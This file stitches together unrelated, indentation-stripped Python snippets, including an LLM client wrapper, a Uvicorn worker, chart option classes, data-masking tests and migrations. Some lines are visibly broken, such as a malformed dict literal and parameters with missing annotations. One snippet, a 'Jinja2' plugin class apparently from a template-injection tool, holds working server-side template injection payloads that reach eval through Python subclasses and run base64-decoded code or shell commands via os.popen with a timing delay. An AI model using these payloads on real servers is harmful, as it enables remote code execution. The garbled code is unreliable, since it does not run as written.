extra_kwargs = {'cache_seed', 'filter_func', 'allow_format_str_template', 'context', 'llm_model'}
def __init__(self, llm_client: LLMClient, output_parser: Optional[BaseOutputParser]=None):
self.llm_echo = False
self.model_cache_enable = False
self._llm_client = llm_client
self._output_parser = (output_parser or BaseOutputParser(is_stream_out=False))
def instantiate(cls, template: Optional[Union[(str, Callable)]]=None, context: Optional[Dict]=None, allow_format_str_template: Optional[bool]=False):
if ((not context) or (template is None)):
return template
if isinstance(template, str):
return (template.format(**context) if allow_format_str_template else template)
return template(context)
def _construct_create_params(self, create_config: Dict, extra_kwargs: Dict) -> Dict:
prompt = create_config.get('prompt')
messages = create_config.get('messages')
if ((prompt is None) == (messages is None)):
raise ValueError('Either prompt or messages should be in create config but not both.')
context = extra_kwargs.get('context')
if (context is None):
return create_config
allow_format_str_template = extra_kwargs.get('allow_format_str_template', False)
params = create_config.copy()
if (prompt is not None):
params['prompt'] = self.instantiate(prompt, context, allow_format_str_template)
elif context:
params['messages'] = [({**m, 'content': self.instantiate(m['content'], context, allow_format_str_template)} if m.get('content') else m) for m in messages]
return params
def _separate_create_config(self, config):
create_config = {k: v for (k, v) in config.items() if (k not in self.extra_kwargs)}
extra_kwargs = {k: v for (k, v) in config.items() if (k in self.extra_kwargs)}
return (create_config, extra_kwargs)
def _get_key(self, config):
non_cache_key = ['api_key', 'base_url', 'api_type', 'api_version']
copied = False
for key in non_cache_key:
if (key in config):
(config, copied) = ((config.copy() if (not copied) else config), True)
config.pop(key)
return json.dumps(config, sort_keys=True, ensure_ascii=False)
async def create(self, **config):
full_config = {**config}
(create_config, extra_kwargs) = self._separate_create_config(full_config)
params = self._construct_create_params(create_config, extra_kwargs)
cache_seed = extra_kwargs.get('cache_seed', 66)
filter_func = extra_kwargs.get('filter_func')
context = extra_kwargs.get('context')
llm_model = extra_kwargs.get('llm_model')
if context:
use_cache = context.get('use_cache', True)
if (not use_cache):
cache_seed = None
try:
response = (await self._completions_create(llm_model, params))
except LLMChatError as e:
logger.debug(f'{llm_model} generate failed!{str(e)}')
raise e
else:
pass_filter = ((filter_func is None) or filter_func(context=context, response=response))
if pass_filter:
return response
def _get_span_metadata(self, payload: Dict) -> Dict:
metadata = {k: v for (k, v) in payload.items()}
metadata['messages'] = list(map((lambda m: (m if isinstance(m, dict) else m.dict())), metadata['messages']))
return metadata
def _llm_messages_convert(self, params):
gpts_messages = params['messages']
return gpts_messages
async def _completions_create(self, llm_model, params):
payload = {'model': llm_model, 'prompt': params.get('prompt'), 'messages': self._llm_messages_convert(params), 'temperature': float(params.get('temperature')), 'max_new_tokens': int(params.get('max_new_tokens')), 'echo': self.llm_echo}
logger.info(f'''Request:
{payload}''')
span = root_tracer.start_span('Agent.llm_client.no_streaming_call', metadata=self._get_span_metadata(payload))
payload['span_id'] = span.span_id
payload['model_cache_enable'] = self.model_cache_enable
try:
model_request = _build_model_request(payload)
model_output = (await self._llm_client.generate(model_request))
parsed_output = self._output_parser.parse_model_nostream_resp(model_output, '###')
return parsed_output
except Exception as e:
logger.error(f'Call LLMClient error, {str(e)}, detail: {traceback.format_exc()}')
raise LLMChatError(original_exception=e) from e
finally:
span.end() |
class UvicornWorker(Worker):
CONFIG_KWARGS: Dict[(str, Any)] = {'loop': 'auto', ' 'auto'}
def __init__(self, *args: Any, **kwargs: Any) -> None:
super(UvicornWorker, self).__init__(*args, **kwargs)
logger = logging.getLogger('uvicorn.error')
logger.handlers = self.log.error_log.handlers
logger.setLevel(self.log.error_log.level)
logger.propagate = False
logger = logging.getLogger('uvicorn.access')
logger.handlers = self.log.access_log.handlers
logger.setLevel(self.log.access_log.level)
logger.propagate = False
config_kwargs: dict = {'app': None, 'log_config': None, 'timeout_keep_alive': self.cfg.keepalive, 'timeout_notify': self.timeout, 'callback_notify': self.callback_notify, 'limit_max_requests': self.max_requests, 'forwarded_allow_ips': self.cfg.forwarded_allow_ips}
if self.cfg.is_ssl:
ssl_kwargs = {'ssl_keyfile': self.cfg.ssl_options.get('keyfile'), 'ssl_certfile': self.cfg.ssl_options.get('certfile'), 'ssl_keyfile_password': self.cfg.ssl_options.get('password'), 'ssl_version': self.cfg.ssl_options.get('ssl_version'), 'ssl_cert_reqs': self.cfg.ssl_options.get('cert_reqs'), 'ssl_ca_certs': self.cfg.ssl_options.get('ca_certs'), 'ssl_ciphers': self.cfg.ssl_options.get('ciphers')}
config_kwargs.update(ssl_kwargs)
if self.cfg.settings['backlog'].value:
config_kwargs['backlog'] = self.cfg.settings['backlog'].value
config_kwargs.update(self.CONFIG_KWARGS)
self.config = Config(**config_kwargs)
def init_process(self) -> None:
self.config.setup_event_loop()
super(UvicornWorker, self).init_process()
def init_signals(self) -> None:
for s in self.SIGNALS:
signal.signal(s, signal.SIG_DFL)
signal.signal(signal.SIGUSR1, self.handle_usr1)
signal.siginterrupt(signal.SIGUSR1, False)
def _install_sigquit_handler(self) -> None:
loop = asyncio.get_running_loop()
loop.add_signal_handler(signal.SIGQUIT, self.handle_exit, signal.SIGQUIT, None)
async def _serve(self) -> None:
self.config.app = self.wsgi
server = Server(config=self.config)
self._install_sigquit_handler()
(await server.serve(sockets=self.sockets))
if (not server.started):
sys.exit(Arbiter.WORKER_BOOT_ERROR)
def run(self) -> None:
return asyncio.run(self._serve())
async def callback_notify(self) -> None:
self.notify() |
class OptionPlotoptionsArearangeSonificationContexttracksMappingLowpassResonance(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def compile_type_def(table_name, table) -> Sql:
assert isinstance(table_name, Id)
assert (table <= T.table)
db = get_db()
posts = []
pks = []
columns = []
pks = {join_names(pk) for pk in table.options.get('pk', [])}
for (name, c) in flatten_type(table):
if ((name in pks) and (c <= T.t_id)):
type_decl = db.id_type_decl
else:
type_decl = _compile_type((db.target if (db.target != mysql) else 'mysql_def'), c)
columns.append(f'{quote_name(name)} {type_decl}')
if (c <= T.t_relation):
if db.supports_foreign_key:
if (not table.options.get('temporary', False)):
rel = c.options['rel']
if rel['key']:
tbl_name = rel['table'].options['name']
s = f"FOREIGN KEY({name}) REFERENCES {quote_id(tbl_name)}({rel['column']})"
posts.append(s)
if (pks and db.supports_foreign_key):
names = ', '.join(map(quote_name, pks))
posts.append(f'PRIMARY KEY ({names})')
if (db.target == 'bigquery'):
command = ('CREATE TABLE' if table.options.get('temporary', False) else 'CREATE TABLE IF NOT EXISTS')
elif (db.target == 'oracle'):
command = ('CREATE TEMPORARY TABLE' if table.options.get('temporary', False) else 'CREATE TABLE')
else:
command = ('CREATE TEMPORARY TABLE' if table.options.get('temporary', False) else 'CREATE TABLE IF NOT EXISTS')
return RawSql(T.nulltype, ((f'{command} {quote_id(table_name)} (' + ', '.join((columns + posts))) + ')')) |
('ecs_deploy.cli.get_client')
def test_deploy_runtime_platform_with_previous_value(get_client, runner):
get_client.return_value = EcsTestClient('acces_key', 'secret_key')
result = runner.invoke(cli.deploy, (CLUSTER_NAME, SERVICE_NAME, '--runtime-platform', 'ARM64', 'WINDOWS'))
expected_runtime_platform = {u'cpuArchitecture': u'ARM64', u'operatingSystemFamily': u'WINDOWS'}
assert (result.exit_code == 0)
assert (not result.exception)
assert (u'Deploying based on task definition: test-task:1' in result.output)
assert (u'Updating task definition' in result.output)
assert (str(expected_runtime_platform) in result.output)
assert (u'Successfully created revision: 2' in result.output)
assert (u'Successfully deregistered revision: 1' in result.output)
assert (u'Successfully changed task definition to: test-task:2' in result.output)
assert (u'Deployment successful' in result.output) |
def test_epoch_insta_finalize_logs(tester, concise_casper, casper_epoch_filter, new_epoch):
start_epoch = concise_casper.START_EPOCH()
new_epoch()
new_epoch()
logs = casper_epoch_filter.get_new_entries()
assert (len(logs) == 4)
log_old = logs[(- 2)]['args']
log_new = logs[(- 1)]['args']
log_fields = {'_number', '_checkpoint_hash', '_is_justified', '_is_finalized'}
assert (log_fields == log_old.keys())
assert (log_new['_number'] == (start_epoch + 2))
init_block_number = (tester.get_block_by_number('latest')['number'] - 1)
assert (Web3.toHex(log_new['_checkpoint_hash']) == tester.get_block_by_number((init_block_number - 1))['hash'])
assert (log_new['_is_justified'] is False)
assert (log_new['_is_finalized'] is False)
assert (log_old['_number'] == (start_epoch + 1))
prev_epoch_block_number = (init_block_number - concise_casper.EPOCH_LENGTH())
assert (Web3.toHex(log_old['_checkpoint_hash']) == tester.get_block_by_number((prev_epoch_block_number - 1))['hash'])
assert (log_old['_is_justified'] is True)
assert (log_old['_is_finalized'] is True) |
class StringRewriteMaskingStrategy(MaskingStrategy):
name = 'string_rewrite'
configuration_model = StringRewriteMaskingConfiguration
def __init__(self, configuration: StringRewriteMaskingConfiguration):
self.rewrite_value = configuration.rewrite_value
self.format_preservation = configuration.format_preservation
def mask(self, values: Optional[List[str]], request_id: Optional[str]) -> Optional[List[str]]:
if (values is None):
return None
masked_values: List[str] = []
for _ in range(len(values)):
if (self.format_preservation is not None):
formatter = FormatPreservation(self.format_preservation)
masked_values.append(formatter.format(self.rewrite_value))
else:
masked_values.append(self.rewrite_value)
return masked_values
def secrets_required(self) -> bool:
return False
def get_description(cls: Type[MaskingStrategy]) -> MaskingStrategyDescription:
return MaskingStrategyDescription(name=cls.name, description='Masks the input value with a default string value', configurations=[MaskingStrategyConfigurationDescription(key='rewrite_value', description='The string that will replace existing values')])
def data_type_supported(data_type: Optional[str]) -> bool:
supported_data_types = {'string'}
return (data_type in supported_data_types) |
class OptionSeriesLollipopSonificationTracksMappingTremolo(Options):
def depth(self) -> 'OptionSeriesLollipopSonificationTracksMappingTremoloDepth':
return self._config_sub_data('depth', OptionSeriesLollipopSonificationTracksMappingTremoloDepth)
def speed(self) -> 'OptionSeriesLollipopSonificationTracksMappingTremoloSpeed':
return self._config_sub_data('speed', OptionSeriesLollipopSonificationTracksMappingTremoloSpeed) |
class Migration(migrations.Migration):
dependencies = [('myauth', '0001_initial'), ('django_etebase', '0001_initial')]
operations = [migrations.CreateModel(name='UserInfo', fields=[('owner', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)), ('version', models.PositiveSmallIntegerField(default=1)), ('pubkey', models.BinaryField(editable=True)), ('salt', models.BinaryField(editable=True))])] |
def edit_catamins(save_stats: dict[(str, Any)]) -> dict[(str, Any)]:
catamins = item.IntItemGroup.from_lists(names=['Catamin A', 'Catamin B', 'Catamin C'], values=save_stats['catamins'], maxes=9999, group_name='Catamins')
catamins.edit()
save_stats['catamins'] = catamins.get_values()
return save_stats |
class CRUDCollection(Generic[T]):
__slots__ = ('_items_by_id',)
def __init__(self) -> None:
self._items_by_id = {}
def create(self, item_id: str, item: T) -> None:
if (item_id in self._items_by_id):
raise ValueError('Item with name {} already present!'.format(item_id))
self._items_by_id[item_id] = item
def read(self, item_id: str) -> Optional[T]:
return self._items_by_id.get(item_id, None)
def update(self, item_id: str, item: T) -> None:
self._items_by_id[item_id] = item
def delete(self, item_id: str) -> None:
if (item_id in self._items_by_id.keys()):
del self._items_by_id[item_id]
def read_all(self) -> List[Tuple[(str, T)]]:
return [(k, v) for (k, v) in self._items_by_id.items()]
def keys(self) -> Set[str]:
return set(self._items_by_id.keys()) |
def learned_count(start_date):
if ah.user_settings['keep_log']:
ah.log.debug('Begin function')
learned = 0
learned = mw.col.db.scalar('\n select count() from\n (select min(id) as id\n from revlog\n where type = 0\n group by cid) as s\n where id/1000 > ?\n ', start_date)
if (learned is None):
learned = 0
if ah.user_settings['keep_log']:
ah.log.debug(('End function returning: %s' % learned))
return learned |
class TestSQLQueryConfig():
def test_extract_query_components(self):
def found_query_keys(node: TraversalNode, values: Dict[(str, Any)]) -> Set[str]:
return set(node.typed_filtered_values(values).keys())
config = SQLQueryConfig(payment_card_node)
assert (config.field_map().keys() == {FieldPath(s) for s in ['id', 'name', 'ccn', 'customer_id', 'billing_address_id']})
assert (payment_card_node.query_field_paths == {FieldPath('id'), FieldPath('customer_id')})
assert (found_query_keys(payment_card_node, {'id': ['A'], 'customer_id': ['V'], 'ignore_me': ['X']}) == {'id', 'customer_id'})
assert (found_query_keys(payment_card_node, {'id': ['A'], 'customer_id': [], 'ignore_me': ['X']}) == {'id'})
assert (found_query_keys(payment_card_node, {'id': ['A'], 'ignore_me': ['X']}) == {'id'})
assert (found_query_keys(payment_card_node, {'ignore_me': ['X']}) == set())
assert (found_query_keys(payment_card_node, {}) == set())
def test_typed_filtered_values(self):
assert (payment_card_node.typed_filtered_values({'id': ['A'], 'customer_id': ['V'], 'ignore_me': ['X']}) == {'id': ['A'], 'customer_id': ['V']})
assert (payment_card_node.typed_filtered_values({'id': ['A'], 'customer_id': [], 'ignore_me': ['X']}) == {'id': ['A']})
assert (payment_card_node.typed_filtered_values({'id': ['A'], 'ignore_me': ['X']}) == {'id': ['A']})
assert (payment_card_node.typed_filtered_values({'id': [], 'customer_id': ['V']}) == {'customer_id': ['V']})
assert (payment_card_node.typed_filtered_values({'id': [1]}) == {'id': ['1']})
assert (payment_card_node.typed_filtered_values({'id': [1, 2]}) == {'id': ['1', '2']})
def test_generated_sql_query(self):
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': ['A'], 'customer_id': ['V'], 'ignore_me': ['X']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE id = :id OR customer_id = :customer_id')
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': ['A'], 'customer_id': [], 'ignore_me': ['X']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE id = :id')
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': ['A'], 'ignore_me': ['X']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE id = :id')
assert (str(SQLQueryConfig(payment_card_node).generate_query({'id': [], 'customer_id': ['V']})) == 'SELECT id,name,ccn,customer_id,billing_address_id FROM payment_card WHERE customer_id = :customer_id')
def test_update_rule_target_fields(self, erasure_policy, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
rule = erasure_policy.rules[0]
config = SQLQueryConfig(customer_node)
assert (config.build_rule_target_field_paths(erasure_policy) == {rule: [FieldPath('name')]})
target = rule.targets[0]
target.data_category = DataCategory('user').value
assert (config.build_rule_target_field_paths(erasure_policy) == {rule: [FieldPath('email'), FieldPath('id'), FieldPath('name')]})
address_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'address')]
config = SQLQueryConfig(address_node)
assert (config.build_rule_target_field_paths(erasure_policy) == {rule: [FieldPath(x) for x in ['city', 'house', 'street', 'state', 'zip']]})
def test_generate_update_stmt_one_field(self, erasure_policy, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
text_clause = config.generate_update_stmt(row, erasure_policy, privacy_request)
assert (text_clause.text == 'UPDATE customer SET name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].key == 'name')
assert (text_clause._bindparams['name'].value is None)
def test_generate_update_stmt_length_truncation(self, erasure_policy_string_rewrite_long, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
text_clause = config.generate_update_stmt(row, erasure_policy_string_rewrite_long, privacy_request)
assert (text_clause.text == 'UPDATE customer SET name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].key == 'name')
assert (text_clause._bindparams['name'].value == 'some rewrite value that is very long and')
def test_generate_update_stmt_multiple_fields_same_rule(self, erasure_policy, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
rule = erasure_policy.rules[0]
target = rule.targets[0]
target.data_category = DataCategory('user').value
rule.masking_strategy = {'strategy': 'hash', 'configuration': {'algorithm': 'SHA-512'}}
secret = MaskingSecretCache[str](secret='adobo', masking_strategy=HashMaskingStrategy.name, secret_type=SecretType.salt)
cache_secret(secret, privacy_request.id)
text_clause = config.generate_update_stmt(row, erasure_policy, privacy_request)
assert (text_clause.text == 'UPDATE customer SET email = :email,name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].key == 'name')
assert (text_clause._bindparams['name'].value == HashMaskingStrategy(HashMaskingConfiguration(algorithm='SHA-512')).mask(['John Customer'], request_id=privacy_request.id)[0][0:40])
assert (text_clause._bindparams['email'].value == HashMaskingStrategy(HashMaskingConfiguration(algorithm='SHA-512')).mask(['customer-'], request_id=privacy_request.id)[0])
clear_cache_secrets(privacy_request.id)
def test_generate_update_stmts_from_multiple_rules(self, erasure_policy_two_rules, example_datasets, connection_config):
dataset = Dataset(**example_datasets[0])
graph = convert_dataset_to_graph(dataset, connection_config.key)
dataset_graph = DatasetGraph(*[graph])
traversal = Traversal(dataset_graph, {'email': 'customer-'})
row = {'email': 'customer-', 'name': 'John Customer', 'address_id': 1, 'id': 1}
customer_node = traversal.traversal_node_dict[CollectionAddress('postgres_example_test_dataset', 'customer')]
config = SQLQueryConfig(customer_node)
text_clause = config.generate_update_stmt(row, erasure_policy_two_rules, privacy_request)
assert (text_clause.text == 'UPDATE customer SET email = :email,name = :name WHERE id = :id')
assert (text_clause._bindparams['name'].value is None)
assert (text_clause._bindparams['email'].value == '*****') |
class OptionPlotoptionsDumbbellSonificationDefaultspeechoptionsMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def _convert_inputs(model, X, is_train):
xp2tensorflow_ = (lambda x: xp2tensorflow(x, requires_grad=is_train))
converted = convert_recursive(is_xp_array, xp2tensorflow_, X)
if isinstance(converted, ArgsKwargs):
def reverse_conversion(dXtf):
return convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return (converted, reverse_conversion)
elif isinstance(converted, dict):
def reverse_conversion(dXtf):
dX = convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return dX.kwargs
return (ArgsKwargs(args=tuple(), kwargs=converted), reverse_conversion)
elif isinstance(converted, (tuple, list)):
def reverse_conversion(dXtf):
dX = convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return dX.args
return (ArgsKwargs(args=converted, kwargs={}), reverse_conversion)
else:
def reverse_conversion(dXtf):
dX = convert_recursive(is_tensorflow_array, tensorflow2xp, dXtf)
return dX.args[0]
return (ArgsKwargs(args=(converted,), kwargs={}), reverse_conversion) |
class ComponentType(str, Enum):
WORKER_MANAGER = 'dbgpt_worker_manager'
WORKER_MANAGER_FACTORY = 'dbgpt_worker_manager_factory'
MODEL_CONTROLLER = 'dbgpt_model_controller'
MODEL_REGISTRY = 'dbgpt_model_registry'
MODEL_API_SERVER = 'dbgpt_model_api_server'
MODEL_CACHE_MANAGER = 'dbgpt_model_cache_manager'
AGENT_HUB = 'dbgpt_agent_hub'
MULTI_AGENTS = 'dbgpt_multi_agents'
EXECUTOR_DEFAULT = 'dbgpt_thread_pool_default'
TRACER = 'dbgpt_tracer'
TRACER_SPAN_STORAGE = 'dbgpt_tracer_span_storage'
RAG_GRAPH_DEFAULT = 'dbgpt_rag_engine_default'
AWEL_TRIGGER_MANAGER = 'dbgpt_awel_trigger_manager'
AWEL_DAG_MANAGER = 'dbgpt_awel_dag_manager'
UNIFIED_METADATA_DB_MANAGER_FACTORY = 'dbgpt_unified_metadata_db_manager_factory' |
class TestReadWrite(util.TestCase):
def test_read_write(self):
markup = '\n <input id="0">\n <textarea id="1"></textarea>\n\n <input id="2">\n <input id="3" disabled>\n\n <input id="4" type="email">\n <input id="5" type="number">\n <input id="6" type="password">\n <input id="7" type="search">\n <input id="8" type="tel">\n <input id="9" type="text">\n <input id="10" type="url">\n <input id="11" type="">\n <input id="12" type>\n\n <input id="13" type="button">\n <input id="14" type="checkbox">\n <input id="15" type="color">\n <input id="16" type="date">\n <input id="17" type="datetime-local">\n <input id="18" type="file">\n <input id="19" type="hidden">\n <input id="20" type="image">\n <input id="21" type="month">\n <input id="22" type="radio">\n <input id="23" type="range">\n <input id="24" type="reset">\n <input id="25" type="submit">\n <input id="26" type="time">\n <input id="27" type="week">\n\n <p id="28" contenteditable="">Text</p>\n <p id="29" contenteditable="true">Text</p>\n <p id="30" contenteditable="TRUE">Text</p>\n <p id="31" contenteditable="false">Text</p>\n <p id="32">Text</p>\n\n <input id="33" type="number" readonly>\n '
self.assert_selector(markup, ':read-write', ['0', '1', '2', '4', '5', '6', '7', '8', '9', '10', '11', '12', '16', '17', '21', '26', '27', '28', '29', '30'], flags=util.HTML) |
class Jinja2(python.Python):
def init(self):
self.update_actions({'render': {'render': '{{%(code)s}}', 'header': '{{%(header)s}}', 'trailer': '{{%(trailer)s}}', 'test_render': ('(%(n1)s,%(n2)s*%(n3)s)' % {'n1': rand.randints[0], 'n2': rand.randints[1], 'n3': rand.randints[2]}), 'test_render_expected': ('%(res)s' % {'res': (rand.randints[0], (rand.randints[1] * rand.randints[2]))})}, 'evaluate': {'call': 'render', 'evaluate': '\'\'}}{%% set d = "eval(__import__(\'base64\').urlsafe_b64decode(\'%(code_b64)s\'))" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == \'catch_warnings\' %%}\n{%% for b in c.__init__.__globals__.values() %%} {%% if b.__class__ == {}.__class__ %%}\n{%% if \'eval\' in b.keys() %%}\n{{ b[\'eval\'](d) }}\n{%% endif %%} {%% endif %%} {%% endfor %%}\n{%% endif %%} {%% endfor %%}{{\'\''}, 'execute_blind': {'call': 'inject', 'execute_blind': '{%% set d = "__import__(\'os\').popen(__import__(\'base64\').urlsafe_b64decode(\'%(code_b64)s\').decode() + \' && sleep %(delay)i\').read()" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == \'catch_warnings\' %%}\n{%% for b in c.__init__.__globals__.values() %%} {%% if b.__class__ == {}.__class__ %%}\n{%% if \'eval\' in b.keys() %%}\n{{ b[\'eval\'](d) }}\n{%% endif %%} {%% endif %%} {%% endfor %%}\n{%% endif %%} {%% endfor %%}'}})
self.set_contexts([{'level': 0}, {'level': 1, 'prefix': '%(closure)s}}', 'suffix': '', 'closures': python.ctx_closures}, {'level': 1, 'prefix': '%(closure)s%%}', 'suffix': '', 'closures': python.ctx_closures}, {'level': 5, 'prefix': '%(closure)s\n', 'suffix': '\n', 'closures': python.ctx_closures}, {'level': 5, 'prefix': '#}', 'suffix': '{#'}]) |
.asyncio
.workspace_host
class TestUpdateEmailTemplate():
async def test_unauthorized(self, unauthorized_api_assertions: HTTPXResponseAssertion, test_client_api: test_data: TestData):
email_template = test_data['email_templates']['base']
response = (await test_client_api.patch(f'/email-templates/{email_template.id}', json={}))
unauthorized_api_assertions(response)
.authenticated_admin
async def test_not_existing(self, test_client_api: not_existing_uuid: uuid.UUID):
response = (await test_client_api.patch(f'/email-templates/{not_existing_uuid}', json={}))
assert (response.status_code == status.HTTP_404_NOT_FOUND)
.parametrize('subject_input,content_input', [('', '{{ foo.bar }}'), ('{{ foo.bar }}', ''), ('', '{% if %}')])
.authenticated_admin
async def test_invalid_template(self, subject_input: str, content_input: str, test_client_api: test_data: TestData):
email_template = test_data['email_templates']['base']
response = (await test_client_api.patch(f'/email-templates/{email_template.id}', json={'subject': subject_input, 'content': content_input}))
assert (response.status_code == status.HTTP_400_BAD_REQUEST)
json = response.json()
assert (json['detail'] == APIErrorCode.EMAIL_TEMPLATE_INVALID_TEMPLATE)
.authenticated_admin
async def test_valid(self, test_client_api: test_data: TestData):
email_template = test_data['email_templates']['base']
response = (await test_client_api.patch(f'/email-templates/{email_template.id}', json={'content': 'UPDATED_CONTENT'}))
assert (response.status_code == status.HTTP_200_OK)
json = response.json()
assert (json['content'] == 'UPDATED_CONTENT') |
def PyQtColor(default='white', allow_none=False, **metadata):
if (default is None):
allow_none = True
if allow_none:
return Trait(default, None, standard_colors, convert_to_color, editor=get_color_editor, **metadata)
return Trait(default, standard_colors, convert_to_color, editor=get_color_editor, **metadata) |
def test_always_transact_block_identifier(accounts, tester, argv, web3, monkeypatch, history):
argv['always_transact'] = True
height = web3.eth.block_number
last_tx = history[(- 1)]
monkeypatch.setattr('brownie.network.chain.undo', (lambda : None))
tester.owner(block_identifier='latest')
assert (web3.eth.block_number == height)
assert (last_tx == history[(- 1)]) |
def process_type(typ):
t = typ.t
if (t == SolType.IntTy):
return ('int', typ.size, [])
elif (t == SolType.UintTy):
return ('uint', typ.size, [])
elif (t == SolType.BoolTy):
return ('bool', '', [])
elif (t == SolType.StringTy):
return ('string', '', [])
elif (t == SolType.SliceTy):
(base, sub, arr) = process_type(typ.elem)
arr.insert(0, [])
return (base, sub, arr)
elif (t == SolType.ArrayTy):
(base, sub, arr) = process_type(typ.elem)
arr.insert(0, [typ.size])
return (base, sub, arr)
elif (t == SolType.AddressTy):
return ('address', '', [])
elif (t == SolType.FixedBytesTy):
return ('bytes', typ.size, [])
elif (t == SolType.BytesTy):
return ('bytes', '', [])
else:
assert False, 'type {} not supported'.format(t) |
def test_play_info():
ali = Aligo()
audio_info = ali.get_audio_play_info(file_id=audio_file_id)
assert isinstance(audio_info, GetAudioPlayInfoResponse)
assert (len(audio_info.template_list) > 0)
video_info = ali.get_video_preview_play_info(file_id=video_file_id)
assert isinstance(video_info, GetVideoPreviewPlayInfoResponse)
assert (len(video_info.video_preview_play_info.live_transcoding_task_list) > 0) |
class OptionSeriesColumnrangeSonificationDefaultinstrumentoptionsMappingVolume(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def upgrade():
op.add_column('image_sizes', sa.Column('icon_size_quality', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('icon_size_width_height', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('small_size_quality', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('small_size_width_height', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('thumbnail_size_quality', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('thumbnail_size_width_height', sa.Integer(), nullable=True)) |
def test_contract_deployment_with_constructor_with_arguments_non_strict(w3_non_strict_abi, non_strict_contract_with_constructor_args_factory):
deploy_txn = non_strict_contract_with_constructor_args_factory.constructor(1234, 'abcd').transact()
txn_receipt = w3_non_strict_abi.eth.wait_for_transaction_receipt(deploy_txn)
assert (txn_receipt is not None)
assert txn_receipt['contractAddress']
contract_address = txn_receipt['contractAddress']
blockchain_code = w3_non_strict_abi.eth.get_code(contract_address)
assert (blockchain_code == decode_hex(CONSTRUCTOR_WITH_ARGUMENTS_CONTRACT_RUNTIME)) |
class TlsCertificateDataAttributes(ModelNormal):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
return {'cert_blob': (str,), 'name': (str,)}
_property
def discriminator():
return None
attribute_map = {'cert_blob': 'cert_blob', 'name': 'name'}
read_only_vars = {}
_composed_schemas = {}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
